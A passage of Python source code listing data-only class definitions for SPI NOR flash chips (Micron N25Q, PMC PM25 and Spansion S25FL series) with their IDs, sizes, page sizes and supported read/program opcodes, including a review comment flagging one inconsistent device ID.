# Data-only entries.  device_id 0xba.. = 3 V parts, 0xbb.. = 1.8 V parts;
# the "..1e"/"..3e" name suffixes use ".." as a wildcard in the part name
# (same convention as the Linux spi-nor flash table).
class N25Q00(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba21
    name = "n25q00"
    total_size = 134217728 # bytes
    page_size = 256 # bytes
    total_pages = 524288
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q00A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb21
    name = "n25q00a"
    total_size = 134217728 # bytes
    page_size = 256 # bytes
    total_pages = 524288
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q016(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb15
    name = "n25q016"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class N25Q016A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb15
    name = "n25q016a"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q032(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba16
    name = "n25q032"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q032XX1E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb16
    name = "n25q032..1e"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class N25Q032XX3E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba16
    name = "n25q032..3e"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class N25Q032A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb16
    name = "n25q032a"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q064(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba17
    name = "n25q064"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q064XX1E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb17
    name = "n25q064..1e"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class N25Q064XX3E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba17
    name = "n25q064..3e"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class N25Q064A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb17
    name = "n25q064a"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q128(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba18
    name = "n25q128"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class N25Q128A11(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb18
    name = "n25q128a11"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q128A13(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba18
    name = "n25q128a13"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q256XX1E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb19
    name = "n25q256..1e"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class N25Q256XX3E(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba19
    name = "n25q256..3e"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class N25Q256A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba19
    name = "n25q256a"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q256AX1(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb19
    name = "n25q256ax1"
    total_size = 33554432 # bytes
    page_size = 256 # bytes
    total_pages = 131072
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q512A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xbb20
    name = "n25q512a"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class N25Q512AX3(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0xba20
    name = "n25q512ax3"
    total_size = 67108864 # bytes
    page_size = 256 # bytes
    total_pages = 262144
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
# --- PMC/Chingis PM25LD and PM25LQ series (listed under the ISSI ID) ---------
# Data-only entries.
# NOTE(review): PM25LQ032 is marked NONJEDEC while PM25LQ032C carries the same
# device_id (0x0046) under ISSI — looks inconsistent; verify against the
# parts' RDID behavior before relying on it for identification.
class PM25LD010(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0021
    name = "pm25ld010"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LD010C(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0021
    name = "pm25ld010c"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LD020(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0022
    name = "pm25ld020"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LD020C(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0022
    name = "pm25ld020c"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LD256C(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x002f
    name = "pm25ld256c"
    total_size = 32768 # bytes
    page_size = 256 # bytes
    total_pages = 128
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LD512(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0020
    name = "pm25ld512"
    total_size = 65536 # bytes
    page_size = 256 # bytes
    total_pages = 256
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LD512C(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0020
    name = "pm25ld512c"
    total_size = 65536 # bytes
    page_size = 256 # bytes
    total_pages = 256
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LQ016(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0045
    name = "pm25lq016"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LQ020(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0042
    name = "pm25lq020"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LQ032(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0046
    name = "pm25lq032"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class PM25LQ032C(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0046
    name = "pm25lq032c"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LQ040(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0043
    name = "pm25lq040"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LQ080(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0044
    name = "pm25lq080"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LV010(SpiNorFlashModule):
    """Non-JEDEC "pm25lv010": 128 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "pm25lv010"
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    page_size = 256  # bytes
    total_pages = 512
    total_size = page_size * total_pages  # 131072 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class PM25LV010A(SpiNorFlashModule):
    """ISSI "pm25lv010a": 128 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "pm25lv010a"
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x007c
    page_size = 256  # bytes
    total_pages = 512
    total_size = page_size * total_pages  # 131072 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LV016B(SpiNorFlashModule):
    """ISSI "pm25lv016b": 2 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "pm25lv016b"
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0014
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LV020(SpiNorFlashModule):
    """ISSI "pm25lv020": 256 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "pm25lv020"
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x007d
    page_size = 256  # bytes
    total_pages = 1024
    total_size = page_size * total_pages  # 262144 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LV040(SpiNorFlashModule):
    """ISSI "pm25lv040": 512 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "pm25lv040"
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x007e
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LV080B(SpiNorFlashModule):
    """ISSI "pm25lv080b": 1 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "pm25lv080b"
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x0013
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class PM25LV512(SpiNorFlashModule):
    """Non-JEDEC "pm25lv512": 64 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "pm25lv512"
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    page_size = 256  # bytes
    total_pages = 256
    total_size = page_size * total_pages  # 65536 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class PM25LV512A(SpiNorFlashModule):
    """ISSI "pm25lv512a": 64 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "pm25lv512a"
    manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
    device_id = 0x007b
    page_size = 256  # bytes
    total_pages = 256
    total_size = page_size * total_pages  # 65536 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL004(SpiNorFlashModule):
    """Spansion "s25fl004": 512 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl004"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0212
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL004A(SpiNorFlashModule):
    """Spansion "s25fl004a": 512 KiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl004a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0212
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL004K(SpiNorFlashModule):
    """Winbond-ID "s25fl004k": 512 KiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl004k"
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4013
    page_size = 256  # bytes
    total_pages = 2048
    total_size = page_size * total_pages  # 524288 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FL008(SpiNorFlashModule):
    """Spansion "s25fl008": 1 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl008"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0213
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL008A(SpiNorFlashModule):
    """Spansion "s25fl008a": 1 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl008a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0213
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL008K(SpiNorFlashModule):
    """Winbond-ID "s25fl008k": 1 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl008k"
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4014
    page_size = 256  # bytes
    total_pages = 4096
    total_size = page_size * total_pages  # 1048576 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FL016(SpiNorFlashModule):
    """Spansion "s25fl016": 2 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl016"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0214
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL016A(SpiNorFlashModule):
    """Spansion "s25fl016a": 2 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl016a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0214
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL016K(SpiNorFlashModule):
    """Winbond-ID "s25fl016k": 2 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl016k"
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4015
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
    ]
    dummy_bits = 8
class S25FL032(SpiNorFlashModule):
    """Spansion "s25fl032": 4 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl032"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0215
    page_size = 256  # bytes
    total_pages = 16384
    total_size = page_size * total_pages  # 4194304 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL032A(SpiNorFlashModule):
    """Spansion "s25fl032a": 4 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl032a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0215
    page_size = 256  # bytes
    total_pages = 16384
    total_size = page_size * total_pages  # 4194304 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL032P(SpiNorFlashModule):
    """Spansion "s25fl032p": 4 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl032p"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0215
    page_size = 256  # bytes
    total_pages = 16384
    total_size = page_size * total_pages  # 4194304 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL064(SpiNorFlashModule):
    """Spansion "s25fl064": 8 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl064"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0216
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL064A(SpiNorFlashModule):
    """Spansion "s25fl064a": 8 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl064a"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0216
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL064K(SpiNorFlashModule):
    """Winbond-ID "s25fl064k": 8 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl064k"
    manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
    device_id = 0x4017
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class S25FL064L(SpiNorFlashModule):
    """Spansion "s25fl064l": 8 MiB SPI NOR flash with dual/quad and 4-byte-address
    opcodes, 256-byte pages, 8 dummy bits."""
    name = "s25fl064l"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x6017
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
        SpiNorFlashOpCodes.PP_1_1_4,
        SpiNorFlashOpCodes.READ_1_1_1_4B,
        SpiNorFlashOpCodes.PP_1_1_1_4B,
        SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
        SpiNorFlashOpCodes.READ_1_1_2_4B,
        SpiNorFlashOpCodes.READ_1_1_4_4B,
        SpiNorFlashOpCodes.PP_1_1_4_4B,
    ]
    dummy_bits = 8
class S25FL064P(SpiNorFlashModule):
    """Spansion "s25fl064p": 8 MiB SPI NOR flash, 256-byte pages, 8 dummy bits."""
    name = "s25fl064p"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x0216
    page_size = 256  # bytes
    total_pages = 32768
    total_size = page_size * total_pages  # 8388608 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class S25FL116K(SpiNorFlashModule):
    """Spansion "s25fl116k": 2 MiB SPI NOR flash with dual/quad I/O, 256-byte pages."""
    name = "s25fl116k"
    manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
    device_id = 0x4015
    page_size = 256  # bytes
    total_pages = 8192
    total_size = page_size * total_pages  # 2097152 bytes
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
        SpiNorFlashOpCodes.READ_1_1_2,
        SpiNorFlashOpCodes.PP_1_1_2,
        SpiNorFlashOpCodes.READ_1_1_4,
